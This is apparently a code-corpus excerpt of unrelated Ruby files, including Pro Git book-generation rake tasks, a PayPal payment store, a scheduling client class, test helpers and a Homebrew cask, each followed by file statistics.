asciidoc = Asciidoctor::Document.new(content,template_dir: template_dir, attributes: { 'compat-mode' => true})
html = asciidoc.render
alldoc = Nokogiri::HTML(html)
number = 1
book = Book.where(:edition => 2, :code => code).first_or_create
  alldoc.xpath("//div[@class='sect1']").each_with_index do |entry, index|
chapter_title = entry.at("h2").content
if !chapters["ch#{index}"]
puts "not including #{chapter_title}\n"
break
end
    chapter_type, chapter_number, filename = chapters["ch#{index}"]
chapter = entry
next if !chapter_title
next if !chapter_number
number = chapter_number
if chapter_type == 'appendix'
number = 100 + chapter_number
end
pretext = entry.search("div[@class=sectionbody]/div/p").to_html
id_xref = chapter.at("h2").attribute('id').to_s
schapter = book.chapters.where(:number => number).first_or_create
schapter.title = chapter_title.to_s
schapter.chapter_type = chapter_type
schapter.chapter_number = chapter_number
schapter.sha = book.ebook_html
schapter.save
# create xref
csection = schapter.sections.where(:number => 1).first_or_create
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
section = 1
chapter.search("div[@class=sect2]").each do |sec|
id_xref = sec.at("h3").attribute('id').to_s
section_title = sec.at("h3").content
html = sec.inner_html.to_s + nav
html.gsub!('<h3', '<h2')
html.gsub!(/\/h3>/, '/h2>')
html.gsub!('<h4', '<h3')
html.gsub!(/\/h4>/, '/h3>')
html.gsub!('<h5', '<h4')
html.gsub!(/\/h5>/, '/h4>')
if xlink = html.scan(/href=\"1-.*?\.html\#(.*?)\"/)
xlink.each do |link|
xref = link.first
html.gsub!(/href=\"1-.*?\.html\##{xref}\"/, "href=\"ch00/#{xref}\"") rescue nil
end
end
if xlink = html.scan(/href=\"\#(.*?)\"/)
xlink.each do |link|
xref = link.first
html.gsub!(/href=\"\##{xref}\"/, "href=\"ch00/#{xref}\"") rescue nil
end
end
if subsec = html.scan(/<img src="(.*?)"/)
subsec.each do |sub|
sub = sub.first
html.gsub!(/<img src="#{sub}"/, "<img src=\"/book/en/v2/#{sub}\"") rescue nil
end
end
puts "\t\t#{chapter_type} #{chapter_number}.#{section} : #{chapter_title} . #{section_title} - #{html.size}"
csection = schapter.sections.where(:number => section).first_or_create
csection.title = section_title.to_s
csection.html = pretext + html
csection.save
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
# record all the xrefs
(sec.search(".//*[@id]")).each do |id|
id_xref = id.attribute('id').to_s
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
end
section += 1
pretext = ""
end
end
book.sections.each do |section|
section.set_slug
section.save
end
end
desc "Generate book html directly from git repo"
task :remote_genbook2 => :environment do
@octokit = Octokit::Client.new(:login => ENV['API_USER'], :password => ENV['API_PASS'])
all_books = {
"be" => "progit/progit2-be",
"cs" => "progit-cs/progit2-cs",
"en" => "progit/progit2",
"es" => "progit/progit2-es",
"fr" => "progit/progit2-fr",
"gr" => "progit2-gr/progit2",
"id" => "progit/progit2-id",
"it" => "progit/progit2-it",
"ja" => "progit/progit2-ja",
"ko" => "progit/progit2-ko",
"nl" => "progit/progit2-nl",
"pl" => "progit2-pl/progit2-pl",
"pt-br" => "progit2-pt-br/progit2",
"ru" => "progit/progit2-ru",
"sl" => "progit/progit2-sl",
"sr" => "progit/progit2-sr",
"tl" => "progit2-tl/progit2",
"tr" => "progit/progit2-tr",
"uk" => "progit/progit2-uk",
"uz" => "progit/progit2-uz",
"zh" => "progit/progit2-zh",
"zh-tw" => "progit/progit2-zh-tw"
}
if ENV['GENLANG']
books = all_books.select { |code, repo| code == ENV['GENLANG']}
else
books = all_books.select do |code, repo|
repo_head = @octokit.ref(repo, "heads/master").object[:sha]
book = Book.where(:edition => 2, :code => code).first_or_create
repo_head != book.ebook_html
end
end
books.each do |code, repo|
begin
blob_content = Hash.new do |blobs, sha|
content = Base64.decode64( @octokit.blob(repo, sha, :encoding => 'base64' ).content )
blobs[sha] = content.force_encoding('UTF-8')
end
repo_tree = @octokit.tree(repo, "HEAD", :recursive => true)
genbook(code) do |filename|
file_handle = repo_tree.tree.detect { |tree| tree[:path] == filename }
if file_handle
blob_content[file_handle[:sha]]
end
end
repo_head = @octokit.ref(repo, "heads/master").object[:sha]
book = Book.where(:edition => 2, :code => code).first_or_create
book.ebook_html = repo_head
begin
rel = @octokit.latest_release(repo)
get_url = -> content_type do
asset = rel.assets.select { |asset| asset.content_type==content_type}.first
if asset
asset.browser_download_url
else
nil
end
end
book.ebook_pdf = get_url.call("application/pdf")
book.ebook_epub = get_url.call("application/epub+zip")
book.ebook_mobi = get_url.call("application/x-mobipocket-ebook")
rescue Octokit::NotFound
book.ebook_pdf = nil
book.ebook_epub = nil
book.ebook_mobi = nil
end
book.save
rescue Exception => msg
puts msg
end
end
end
desc "Generate book html directly from git repo"
task :local_genbook2 => :environment do
if (ENV['GENLANG'] && ENV['GENPATH'])
genbook(ENV['GENLANG']) do |filename|
File.open(File.join(ENV['GENPATH'], filename), "r") {|infile| File.read(infile)}
end
end
end
desc "Generate the book html for the sites (by downloading from atlas)"
task :genbook2 => :environment do
if ENV['GENLANG']
books = Book.where(:edition => 2, :code => ENV['GENLANG'])
else
books = Book.where(:edition => 2, :processed => false)
end
nav = '<div id="nav"><a href="[[nav-prev]]">prev</a> | <a href="[[nav-next]]">next</a></div>'
books.each do |book|
html_file = download(book.ebook_html) # download processed html ebook
Zip::File.open(html_file) do |zip_file|
# Handle entries one by one
max_chapter = 0
chapters = {}
appnumber = 0
chnumber = 0
ids = {}
toc = JSON.parse(zip_file.find_entry("build.json").get_input_stream.read)
navi = nil
if toc['navigations']
navi = toc['navigations']['navigation']
elsif toc['navigation']
navi = toc['navigation']['navigation']
end
navi.each_with_index do |chthing, index|
if chthing['type'] == 'appendix'
appnumber += 1
chapters["xapp#{index}"] = ['appendix', appnumber, chthing['href'], chthing['label']]
end
if chthing['type'] == 'chapter'
chnumber += 1
chapters["ch#{index}"] = ['chapter', chnumber, chthing['href'], chthing['label']]
end
chthing['children'].each do |child|
ids[child['id']] = child['label']
end
end
# sort and create the numbers in order
number = 0
chapters.sort.each_with_index do |entry, index|
p entry
chapter_type, chapter_number, file, title = entry[1]
p file
content = zip_file.find_entry(file).get_input_stream.read
doc = Nokogiri::HTML(content)
chapter = doc.at("section[@data-type=#{chapter_type}]")
chapter_title = title
next if !chapter_title
next if !chapter_number
puts chapter_title
puts chapter_number
number = chapter_number
if chapter_type == 'appendix'
number = 100 + chapter_number
end
id_xref = chapter.attribute('id').to_s
pretext = "<a id=\"#{id_xref}\"></a>"
pretext += doc.search("section[@data-type=#{chapter_type}] > p").to_html
schapter = book.chapters.where(:number => number).first_or_create
schapter.title = chapter_title.to_s
schapter.chapter_type = chapter_type
schapter.chapter_number = chapter_number
schapter.sha = book.ebook_html
schapter.save
# create xref
csection = schapter.sections.where(:number => 1).first_or_create
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
section = 1
chapter.search("section[@data-type=sect1]").each do |sec|
id_xref = sec.attribute('id').to_s
section_title = ids[id_xref]
pretext += "<a id=\"#{id_xref}\"></a>"
html = pretext + sec.inner_html.to_s + nav
html.gsub!('<h3', '<h4')
html.gsub!(/\/h3>/, '/h4>')
html.gsub!('<h2', '<h3')
html.gsub!(/\/h2>/, '/h3>')
html.gsub!('<h1', '<h2')
html.gsub!(/\/h1>/, '/h2>')
if xlink = html.scan(/href=\"1-.*?\.html\#(.*?)\"/)
xlink.each do |link|
xref = link.first
html.gsub!(/href=\"1-.*?\.html\##{xref}\"/, "href=\"ch00/#{xref}\"") rescue nil
end
end
if xlink = html.scan(/href=\"\#(.*?)\"/)
xlink.each do |link|
xref = link.first
html.gsub!(/href=\"\##{xref}\"/, "href=\"ch00/#{xref}\"") rescue nil
end
end
html.gsub!(%r{&(gt|lt|amp);}, '&\1;')
html.gsub!(%r{&</code>(<code class="n">)?(gt|lt|amp)(</code>)?<code class=".">;}, '&\2;')
if subsec = html.scan(/<h3>(.*?)<\/h3>/)
subsec.each do |sub|
sub = sub.first
id = sub.gsub(' ', '-')
html.gsub!(/<h3>#{sub}<\/h3>/, "<h3 id=\"#{id}\"><a href=\"##{id}\">#{sub}</a></h3>") rescue nil
end
end
if subsec = html.scan(/<img src="(.*?)"/)
subsec.each do |sub|
sub = sub.first
html.gsub!(/<img src="#{sub}"/, "<img src=\"/book/en/v2/#{sub}\"") rescue nil
end
end
puts "\t\t#{chapter_type} #{chapter_number}.#{section} : #{chapter_title} . #{section_title} - #{html.size}"
csection = schapter.sections.where(:number => section).first_or_create
csection.title = section_title.to_s
csection.html = html
csection.save
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
# record all the xrefs
(sec.search("section[@id]")+sec.search("figure[@id]")+sec.search("table[@id]")).each do |id|
id_xref = id.attribute('id').to_s
if id_xref[0,3] != 'idp'
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
end
end
section += 1
pretext = ""
end # loop through sections
#extra = schapter.sections.where("number >= #{section}")
#extra.delete_all
end # if it's a chapter
#extra = book.chapters.where("number > #{number}")
#extra.delete_all
end
book.processed = true
book.save
book.sections.each do |section|
section.set_slug
section.save
end
end
end
def self.download(url)
puts "downloading #{url}"
#return "/Users/schacon/github/progit/gitscm2/ugh/progit-en.661.zip" # for testing
file = File.new("#{Rails.root}/tmp/download" + Time.now.to_i.to_s + Random.new.rand(100).to_s, 'wb')
begin
uri = URI.parse(url)
Net::HTTP.start(uri.host,uri.port, :use_ssl => uri.scheme == 'https') do |http|
http.request_get(uri.path) do |resp|
resp.read_body do |segment|
file.write(segment)
end
end
end
puts "Done."
ensure
file.close
end
file.path
end
| 31.393548 | 118 | 0.574599 |
e9dc758e46a93c8001d9be70cc0a87f1ad8d1433 | 205 | module Qapi
class Error < RuntimeError
def initialize(body)
@body = JSON(body)
end
def message
@body['problem']
end
def details
@body['details']
end
end
end
| 12.8125 | 28 | 0.57561 |
4abc56459903335c1eb8235b2730fdff52ac700b | 485 | if ENV["COVERALL"]
require "coveralls"
Coveralls.wear!
end
require "minitest/autorun"
require "minitest/reporters"
require "mocha/setup"
Minitest::Reporters.use! Minitest::Reporters::DefaultReporter.new(color: true)
$LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "public_suffix"
Minitest::Test.class_eval do
  unless method_defined?(:assert_not_equal)
def assert_not_equal(exp, act, msg = nil)
assert_operator(exp, :!=, act, msg)
end
end
end
| 22.045455 | 78 | 0.736082 |
ab78cd74eafc53f3117c62075b6fe10a08f3fc8a | 905 | #!/usr/bin/env ruby
# Identical to Part 1
require 'set'
file_path = File.expand_path("../day-19-input.txt", __FILE__)
input = File.read(file_path)
grid = input.split("\n").map do |row|
row.split("")
end
y = 0
x = grid[y].index("|")
direction = :down
steps = 0
visited = Set.new
chars = []
until grid[y][x] == ' '
steps += 1
visited.add([y,x])
case direction
when :down
y += 1
when :up
y -= 1
when :left
x -= 1
when :right
x += 1
end
cell = grid[y][x]
case cell
when '+'
neighbours = [
[:right, y, x + 1],
[:left, y, x - 1],
[:up, y - 1, x],
[:down, y + 1, x]
]
neighbours.each do |dir, y, x|
next if y < 0 || x < 0 || y >= grid.size || x >= grid[y].size
next if visited.include?([y,x])
direction = dir if grid[y][x] != ' '
end
when /\w/
chars << cell
end
end
puts chars.join
puts steps
| 14.836066 | 67 | 0.519337 |
38004aab8ce3d6ec922e88f254c00f7877c6f9a2 | 434 | cask 'comictagger' do
version '1.2.1'
sha256 '31b36527b9415544e2f956c849309320bb955524eaa1ebddab6b97d55c5da4f8'
url "https://github.com/davide-romanini/comictagger/releases/download/#{version}/ComicTagger-#{version}-osx-10.12.6-x86_64.app.zip"
appcast 'https://github.com/davide-romanini/comictagger/releases.atom'
name 'ComicTagger'
homepage 'https://github.com/davide-romanini/comictagger'
app 'ComicTagger.app'
end
| 36.166667 | 133 | 0.78341 |
bbd236dc307d755ae96a01c0c24e2b97a132c129 | 426 | module ActionClient
class ClientsController < ActionClient::ApplicationController
def index
render locals: {
clients: ActionClient::Preview.all
}
end
def show
preview = ActionClient::Preview.find(params[:id])
if preview.present?
render locals: {
client: preview
}
else
raise AbstractController::ActionNotFound
end
end
end
end
| 19.363636 | 63 | 0.619718 |
611fd261751b12715d62a6db13ec1b3a01f2b3cc | 6,302 | module PaypalService::Store::PaypalPayment
PaypalPaymentModel = ::PaypalPayment
InitialPaymentData = EntityUtils.define_builder(
[:community_id, :mandatory, :fixnum],
[:transaction_id, :mandatory, :fixnum],
[:payer_id, :mandatory, :string],
[:receiver_id, :mandatory, :string],
[:merchant_id, :mandatory, :string],
[:payment_status, :mandatory, :string],
[:pending_reason],
[:ext_transaction_id, :string],
[:payment_total, :mandatory, :money],
[:payment_date, :mandatory, :time],
[:currency, :mandatory, :string],
[:token, :string],
)
PaypalPayment = EntityUtils.define_builder(
[:id, :fixnum],
[:community_id, :mandatory, :fixnum],
[:transaction_id, :mandatory, :fixnum],
[:payer_id, :mandatory, :string],
[:receiver_id, :mandatory, :string],
[:merchant_id, :mandatory, :string],
[:payment_status, :mandatory, :symbol],
[:pending_reason, :to_symbol],
[:ext_transaction_id, :string],
[:payment_date, :time],
[:payment_total, :money],
[:fee_total, :money],
[:token, :string])
OPT_UPDATE_FIELDS = [
:ext_transaction_id,
:payment_date,
:payment_total_cents,
:fee_total_cents
]
module_function
# Arguments:
# Opts with mandatory key :data and optional keys :transaction_id, :community_id, :order_id, :authorization_id
# Optional keys identify paypal payment row
#
# Return updated data or if no change, return nil
def update(opts)
if(opts[:data].nil?)
raise ArgumentError.new("No data provided")
end
payment = find_payment(opts)
old_data = from_model(payment)
new_data = update_payment!(payment, opts[:data])
new_data if data_changed?(old_data, new_data)
end
def create(community_id, transaction_id, payment)
begin
payment[:payment_status] = payment[:payment_status].downcase if payment[:payment_status]
payment.merge!({payment_date: Time.now, community_id: community_id, transaction_id: transaction_id, currency: payment[:payment_total].currency.iso_code})
model = PaypalPaymentModel.create!(
InitialPaymentData.call(payment)
)
from_model(model)
rescue ActiveRecord::RecordNotUnique => rnu
get(community_id, transaction_id)
end
end
def get(community_id, transaction_id)
Maybe(PaypalPaymentModel.where(
community_id: community_id,
transaction_id: transaction_id
).first)
.map { |model| from_model(model) }
.or_else(nil)
end
## Privates
def from_model(paypal_payment)
hash = HashUtils.compact(
EntityUtils.model_to_hash(paypal_payment).merge({
payment_total: paypal_payment.payment_total,
fee_total: paypal_payment.fee_total,
payment_status: paypal_payment[:payment_status].to_sym
}))
PaypalPayment.call(hash)
end
def find_payment(opts)
PaypalPaymentModel.where(
"(community_id = ? and transaction_id = ?) or ext_transaction_id = ?",
opts[:community_id],
opts[:transaction_id],
opts[:ext_transaction_id]
).first
end
def data_changed?(old_data, new_data)
old_data != new_data
end
def initial(payment)
payment_total = payment[:payment_total]
total = { payment_total_cents: payment_total.cents, currency: payment_total.currency.iso_code }
InitialPaymentData.call(payment.merge(total))
end
def create_payment_update(update, current_state)
cent_totals = [:payment_total, :fee_total]
.reduce({}) do |cent_totals, m_key|
m = update[m_key]
cent_totals["#{m_key}_cents".to_sym] = m.cents unless m.nil?
cent_totals
end
payment_update = {}
new_status = transform_status(update[:payment_status]) if update[:payment_status]
new_pending_reason = transform_pending_reason(update[:pending_reason])
new_state = to_state(new_status, new_pending_reason) if new_status
if(new_state && valid_transition?(current_state, new_state))
payment_update[:payment_status] = new_status
payment_update[:pending_reason] = new_pending_reason
end
payment_update = HashUtils.sub(update, *OPT_UPDATE_FIELDS).merge(cent_totals).merge(payment_update)
return payment_update
end
def transform_status(status)
status.is_a?(Symbol) ? status : status.downcase.to_sym
end
def transform_pending_reason(reason)
if(reason.nil?)
:none
elsif(reason.is_a? Symbol)
reason
elsif(reason == "payment-review") # Canonical version of payment-review status is with dash
reason.downcase.to_sym
else
reason.downcase.gsub(/[-_]/, "").to_sym # Normalize dashes and underscores away
end
end
def update_payment!(payment, data)
current_state = to_state(payment.payment_status.to_sym, payment.pending_reason.to_sym)
payment_update = create_payment_update(data, current_state)
if payment.nil?
raise ArgumentError.new("No matching payment to update.")
end
payment.update_attributes!(payment_update)
from_model(payment.reload)
end
STATES = {
order: [:pending, :order],
payment_review: [:pending, :"payment-review"],
authorized: [:pending, :authorization],
expired: [:expired, :none],
pending_ext: [:pending, :ext],
completed: [:completed, :none],
voided: [:voided, :none],
denied: [:denied, :none]
}
INTERNAL_REASONS = [:none, :authorization, :order, :"payment-review"]
STATE_HIERARCHY = {
order: 0,
payment_review: 1,
authorized: 2,
expired: 3,
voided: 3,
pending_ext: 3,
completed: 4,
denied: 4,
}
def valid_transition?(current_state, new_state)
STATE_HIERARCHY[current_state] < STATE_HIERARCHY[new_state]
end
def to_state(status, reason)
state = STATES.find { |_, arr| arr == [status, pending_ext_or_internal(reason)] }
unless state.nil?
state.first
else
raise ArgumentError.new("No matching state for status: #{status} and reason: #{reason}.")
end
end
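  # Illustrative mapping (follows directly from STATES and STATE_HIERARCHY above):
  #
  #   to_state(:pending, :authorization)         # => :authorized
  #   to_state(:completed, :none)                # => :completed
  #   to_state(:pending, :echeck)                # => :pending_ext (external reason)
  #   valid_transition?(:authorized, :completed) # => true  (2 < 4)
  #   valid_transition?(:completed, :authorized) # => false (4 is not < 2)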
def pending_ext_or_internal(reason)
INTERNAL_REASONS.include?(reason) ? reason : :ext
end
### DEPRECATED! ###
def for_transaction(transaction_id)
Maybe(PaypalPaymentModel.where(transaction_id: transaction_id).first)
.map { |model| from_model(model) }
.or_else(nil)
end
end
| 29.041475 | 159 | 0.688353 |
1da17cbde22e654c66a4c9ba5209c04460e7e5b3 | 875 | module Errors
extend ActiveSupport::Concern
included do
    # Parameter value is not within the allowed range
# HTTP Status 400
#
    # { error: 'ParameterInvalid', message: 'reason' }
class ParameterValueNotAllowed < ActionController::ParameterMissing
attr_reader :values
def initialize(param, values)
# :nodoc:
@param = param
@values = values
super("param: #{param} value only allowed in: #{values}")
end
end
    # Authentication failed
# HTTP Status 401
#
    # { error: 'Unauthorized', message: 'reason' }
class UnauthorizedToken < StandardError; end
    # Returned when the user lacks permission
# HTTP Status 403
#
    # { error: 'AccessDenied', message: 'reason' }
class AccessDenied < StandardError; end
    # Resource does not exist
# HTTP Status 404
#
    # { error: 'ResourceNotFound', message: 'reason' }
class PageNotFound < StandardError; end
end
end
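# A minimal wiring sketch (hypothetical controller, not part of this concern;
# rescue_from is standard ActionController API):
#
#   class ApplicationController < ActionController::API
#     include Errors
#     rescue_from Errors::UnauthorizedToken do
#       render json: { error: 'Unauthorized', message: 'invalid token' }, status: 401
#     end
#     rescue_from Errors::AccessDenied do
#       render json: { error: 'AccessDenied', message: 'no permission' }, status: 403
#     end
#   end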
| 22.435897 | 71 | 0.598857 |
f7a2db0b25fad8f12d3f61e4cc6ceb10162bb1ed | 13,550 | # encoding: UTF-8
#
# Copyright (c) 2010-2015 GoodData Corporation. All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
require_relative '../rest/resource'
require_relative '../extensions/hash'
require_relative '../mixins/rest_resource'
require_relative '../helpers/global_helpers'
require_relative 'execution'
module GutData
class Schedule < Rest::Resource
attr_reader :dirty, :json
SCHEDULE_TEMPLATE = {
:schedule => {
:type => nil,
:timezone => nil,
:params => {},
:hiddenParams => {},
# :reschedule => nil
}
}
class << self
# Looks for schedule
# @param id [String] URL, ID of schedule or :all
# @return [GutData::Schedule|Array<GutData::Schedule>] List of schedules
def [](id, opts = { :client => GutData.connection, :project => GutData.project })
c, project = GutData.get_client_and_project(opts)
if id == :all
GutData::Schedule.all(opts)
else
if id =~ %r{\/gdc\/projects\/[a-zA-Z\d]+\/schedules\/?[a-zA-Z\d]*}
url = id
tmp = c.get url
return c.create(GutData::Schedule, tmp)
end
tmp = c.get "/gdc/projects/#{project.pid}/schedules/#{id}"
c.create(GutData::Schedule, tmp, project: project)
end
end
# Returns list of all schedules for active project
# @return [Array<GutData::Schedule>] List of schedules
def all(opts = { :client => GutData.connection, :project => GutData.project })
c, project = GutData.get_client_and_project(opts)
tmp = c.get "/gdc/projects/#{project.pid}/schedules"
tmp['schedules']['items'].map { |schedule| c.create(GutData::Schedule, schedule, project: project) }
end
# Creates new schedules from parameters passed
#
# @param process_id [String] Process ID
# @param trigger [String|GutData::Schedule] Trigger of schedule. Can be cron string or reference to another schedule.
# @param executable [String] Execution executable
# @param options [Hash] Optional options
# @return [GutData::Schedule] New GutData::Schedule instance
def create(process_id, trigger, executable, options = {})
c, project = GutData.get_client_and_project(options)
fail 'Process ID has to be provided' if process_id.blank?
fail 'Executable has to be provided' if executable.blank?
fail 'Trigger schedule has to be provided' if trigger.blank?
schedule = c.create(GutData::Schedule, GutData::Helpers.deep_stringify_keys(GutData::Helpers.deep_dup(SCHEDULE_TEMPLATE)), client: c, project: project)
default_opts = {
:type => 'MSETL',
:timezone => 'UTC',
:state => 'ENABLED',
:params => {
'PROCESS_ID' => process_id,
'EXECUTABLE' => executable
},
# :reschedule => nil
}
schedule.name = options[:name]
schedule.set_trigger(trigger)
schedule.params = default_opts[:params].merge(options[:params] || {})
schedule.hidden_params = options[:hidden_params] || {}
schedule.timezone = options[:timezone] || default_opts[:timezone]
schedule.state = options[:state] || default_opts[:state]
schedule.schedule_type = options[:type] || default_opts[:type]
schedule.reschedule = options[:reschedule] if options[:reschedule]
schedule
end
end
# Initializes object from raw json
#
# @param json [Object] Raw JSON
# @return [GutData::Schedule] New GutData::Schedule instance
def initialize(json)
json = GutData::Helpers.deep_stringify_keys(json)
super
@json = json
self.params = GutData::Helpers.decode_params(json['schedule']['params'] || {})
self.hidden_params = GutData::Helpers.decode_params(json['schedule']['hiddenParams'] || {})
end
def after
project.schedules(trigger_id)
end
def after=(schedule)
fail 'After trigger has to be a schedule object' unless schedule.is_a?(Schedule)
json['schedule']['triggerScheduleId'] = schedule.obj_id
@json['schedule']['cron'] = nil
@dirty = true
end
# Deletes schedule
def delete
saved? ? client.delete(uri) : nil
end
    # Is the schedule disabled?
#
# @return [Boolean]
def disabled?
state == 'DISABLED'
end
# Is schedule enabled?
#
# @return [Boolean]
def enabled?
!disabled?
end
    # Enables the schedule.
#
# @return [GutData::Schedule]
def enable
@json['schedule']['state'] = 'ENABLED'
@dirty = true
self
end
    # Disables the schedule.
#
# @return [GutData::Schedule]
def disable
@json['schedule']['state'] = 'DISABLED'
@dirty = true
self
end
# Executes schedule
#
# @param [Hash] opts execution options.
# @option opts [Boolean] :wait Wait for execution result
# @return [Object] Raw Response
def execute(opts = {})
return nil unless saved?
opts = { :wait => true }.merge(opts)
data = {
:execution => {}
}
res = client.post(execution_url, data)
execution = client.create(GutData::Execution, res, client: client, project: project)
return execution unless opts[:wait]
execution.wait_for_result(opts)
end
# Returns execution URL
#
# @return [String] Executions URL
def execution_url
saved? ? @json['schedule']['links']['executions'] : nil
end
# Returns execution state
#
# @return [String] Execution state
def state
@json['schedule']['state']
end
def state=(a_state)
@json['schedule']['state'] = a_state
end
# Returns execution timezone
#
# @return [String] Execution timezone
def timezone
@json['schedule']['timezone']
end
# Assigns execution timezone
#
# @param new_timezone [String] Timezone to be set
def timezone=(new_timezone)
@json['schedule']['timezone'] = new_timezone
@dirty = true
end
# Returns execution type
#
# @return [String] Execution type
def type
@json['schedule']['type']
end
# Assigns execution type
#
# @param new_type [String] Execution type to be set
def type=(new_type)
@json['schedule']['type'] = new_type
@dirty = true
end
# Returns execution cron settings
#
# @return [String] Cron settings
def cron
@json['schedule']['cron']
end
# Assigns execution cron settings
#
# @param new_cron [String] Cron settings to be set
def cron=(new_cron)
@json['schedule']['cron'] = new_cron
@json['schedule']['triggerScheduleId'] = nil
@dirty = true
end
# Returns reschedule settings
#
# @return [Integer] Reschedule settings
def reschedule
@json['schedule']['reschedule']
end
# Assigns execution reschedule settings
#
# @param new_reschedule [Integer] Reschedule settings to be set
def reschedule=(new_reschedule)
@json['schedule']['reschedule'] = new_reschedule
@dirty = true
end
# Returns execution process related to this schedule
#
    # @return [GutData::Process] The process
def process
project.processes(process_id)
end
# Returns execution process ID
#
# @return [String] Process ID
def process_id
@json['schedule']['params']['PROCESS_ID']
end
def process_id=(new_project_id)
@json['schedule']['params']['PROCESS_ID'] = new_project_id
@dirty = true
end
# Returns execution executable
#
# @return [String] Executable (graph) name
def executable
@json['schedule']['params']['EXECUTABLE']
end
# Assigns execution executable
#
# @param new_executable [String] Executable to be set.
def executable=(new_executable)
@json['schedule']['params']['EXECUTABLE'] = new_executable
@dirty = true
end
# Returns enumerator of executions
#
    # @return [Enumerator] Enumerator over GutData::Execution objects
def executions
return nil unless @json
url = @json['schedule']['links']['executions']
Enumerator.new do |y|
loop do
res = client.get url
res['executions']['paging']['next']
res['executions']['items'].each do |execution|
y << client.create(Execution, execution, :project => project)
end
url = res['executions']['paging']['next']
break unless url
end
end
end
# Returns hidden_params as Hash
#
# @return [Hash] Hidden Parameters
def hidden_params
@json['schedule']['hiddenParams']
end
# Updates params by merging the current params with new ones
#
# @param params_to_merge [Hash] params
# @return [GutData::Schedule] Returns self
def update_params(params_to_merge)
params_to_merge.each do |k, v|
set_parameter(k, v)
end
@dirty = true
self
end
# Updates hidden params by merging the current params with new ones
#
# @param params_to_merge [Hash] params
# @return [GutData::Schedule] Returns self
def update_hidden_params(params_to_merge)
params_to_merge.each do |k, v|
set_hidden_parameter(k, v)
end
@dirty = true
self
end
# Assigns hidden parameters
#
    # @param new_hidden_params [Hash] Hidden parameters to be set
def hidden_params=(new_hidden_params = {})
@json['schedule']['hiddenParams'] = new_hidden_params
@dirty = true
self
end
# Returns params as Hash
#
# @return [Hash] Parameters
def params
@json['schedule']['params']
end
# Assigns execution parameters
#
    # @param new_params [Hash] Params to be set
def params=(new_params = {})
default_params = {
'PROCESS_ID' => process_id,
'EXECUTABLE' => executable
}
@json['schedule']['params'] = default_params.merge(new_params)
@dirty = true
self
end
# Saves object if dirty
#
# @return [Boolean] True if saved
def save
fail 'trigger schedule has to be provided' if cron.blank? && trigger_id.blank?
fail 'A timezone has to be provided' if timezone.blank?
fail 'Schedule type has to be provided' if schedule_type.blank?
if @dirty
if saved?
res = client.put(uri, to_update_payload)
@json = Schedule.new(res).json
else
res = client.post "/gdc/projects/#{project.pid}/schedules", to_update_payload
fail 'Unable to create new schedule' if res.nil?
new_obj_json = client.get res['schedule']['links']['self']
@json = Schedule.new(new_obj_json).json
end
@dirty = false
end
self
end
# Updates params at key k with val v
#
# @param k [String] key
# @param v [Object] value
# @return [GutData::Schedule] Returns self
def set_parameter(k, v)
params[k] = v
@dirty = true
self
end
# Updates hidden params at key k with val v
#
# @param k [String] key
# @param v [Object] value
# @return [GutData::Schedule] Returns self
def set_hidden_parameter(k, v)
hidden_params[k] = v
@dirty = true
self
end
def schedule_type
json['schedule']['type']
end
def schedule_type=(type)
json['schedule']['type'] = type
@dirty = true
self
end
def time_based?
cron != nil
end
def to_hash
{
name: name,
type: type,
state: state,
params: params,
hidden_params: hidden_params,
cron: cron,
trigger_id: trigger_id,
timezone: timezone,
uri: uri,
reschedule: reschedule,
executable: executable,
process_id: process_id
}
end
def trigger_id
json['schedule']['triggerScheduleId']
end
def trigger_id=(a_trigger)
json['schedule']['triggerScheduleId'] = a_trigger
@dirty = true
self
end
def name
json['schedule']['name']
end
def name=(name)
json['schedule']['name'] = name
@dirty = true
self
end
def set_trigger(trigger) # rubocop:disable Style/AccessorMethodName
      if trigger.is_a?(String) && trigger =~ /[a-fA-F0-9]{24}/
self.trigger_id = trigger
elsif trigger.is_a?(GutData::Schedule)
self.trigger_id = trigger.obj_id
else
self.cron = trigger
end
end
# Returns URL
#
# @return [String] Schedule URL
def uri
@json['schedule']['links']['self'] if @json && @json['schedule'] && @json['schedule']['links']
end
def ==(other)
other.respond_to?(:uri) && other.uri == uri && other.respond_to?(:to_hash) && other.to_hash == to_hash
end
def to_update_payload
res = {
'schedule' => {
'name' => name,
'type' => type,
'state' => state,
'timezone' => timezone,
'cron' => cron,
'triggerScheduleId' => trigger_id,
'params' => GutData::Helpers.encode_public_params(params),
'hiddenParams' => GutData::Helpers.encode_hidden_params(hidden_params)
}
}
res['schedule']['reschedule'] = reschedule if reschedule
res
end
end
end
| 26.93837 | 159 | 0.600812 |
abef1edcb482a64175f5262d92c9c31649f7be0b | 894 | require 'yaml'
module FlipTheSwitch
module Reader
class Defaults
def defaults
if valid_file?
base_defaults.merge(file_defaults)
else
raise Error::InvalidFile.new(defaults_file_name)
end
end
private
def valid_file?
file_defaults.is_a?(Hash)
end
def base_defaults
{
'input' => Dir.pwd,
'environment' => 'default',
'enabled' => '',
'disabled' => '',
'category_output' => Dir.pwd,
'plist_output' => Dir.pwd,
'settings_output' => Dir.pwd
}
end
def file_defaults
@file_defaults ||= if File.exists?(defaults_file_name)
YAML.load(File.read(defaults_file_name))
else
{}
end
end
def defaults_file_name
'.flip.yml'
end
end
end
end
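# Illustrative sketch of a `.flip.yml` read by Defaults#file_defaults above
# (hypothetical values; any key left out keeps its base default):
#
#   environment: production
#   input: ./features
#   category_output: ./Generated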
| 19.434783 | 62 | 0.526846 |
e9f2e885b0a7c0be5f1eaafd60ed8e50f9216652 | 583 | require 'mongoid/cases/test_base'
class Mongoid::ValidationsTest < ClientSideValidations::MongoidTestBase
class ::Book3 < Book
validates :author_name, :presence => true
end
def test_validations_to_client_side_hash
book = Book3.new
expected_hash = {
:author_email => {
:uniqueness => [{:message => "is already taken"}]
}, :author_name => {
:uniqueness => [{:message => "is already taken"}],
:presence => [{:message => "can't be blank"}]
}
}
assert_equal expected_hash, book.client_side_validation_hash
end
end
| 25.347826 | 71 | 0.646655 |
18566717084425fd00db5309be37fb89102664c9 | 1,428 | =begin
